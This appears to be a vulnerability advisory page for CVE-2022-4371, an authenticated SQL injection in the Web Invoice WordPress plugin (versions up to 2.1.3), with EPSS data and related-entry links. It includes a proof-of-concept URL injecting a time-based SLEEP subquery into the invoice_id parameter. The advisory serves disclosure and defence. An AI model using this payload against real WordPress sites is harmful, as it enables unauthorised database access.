Lucene search
Daniel KrohmerWPVDB-ID:45F43359-98C2-4447-B51B-2D466BAD8261HistoryDec 12, 2022 - 12:00 a.m.
Web Invoice <= 2.1.3 - Authenticated SQLi
2022-12-1200:00:00
Daniel Krohmer
wpscan.com
11
web invoice plugin
version 2.1.3
authenticated sql injection
parameter sanitization
sql statement
high privilege users
plugin configuration
user management
url manipulation
admin privilege
subscriber exploit
EPSS
0.001
Percentile
50.4%
The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL Injection exploitable by high privilege users such as admin by default. However, depending on the plugin configuration, other users, such as subscriber could exploit this as well
PoC
When logged in with a user allowed to Manage invoice (default admin but can be changed via the plugin’s settings), open the following URL https://example.com/wp-admin/admin.php?page=new_web_invoice&invoice;_id=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&web;_invoice_action=clear_log
Related
prion
prion
Sql injection
2023-01-02 22:15:00
cvelist
cvelist
CVE-2022-4371 Web Invoice <= 2.1.3 - Authenticated SQLi
2023-01-02 21:49:06
cve
cve
CVE-2022-4371
2023-01-02 22:15:17
wpexploit
wpexploit
Web Invoice <= 2.1.3 - Authenticated SQLi
2022-12-12 00:00:00
nvd
nvd
CVE-2022-4371
2023-01-02 22:15:17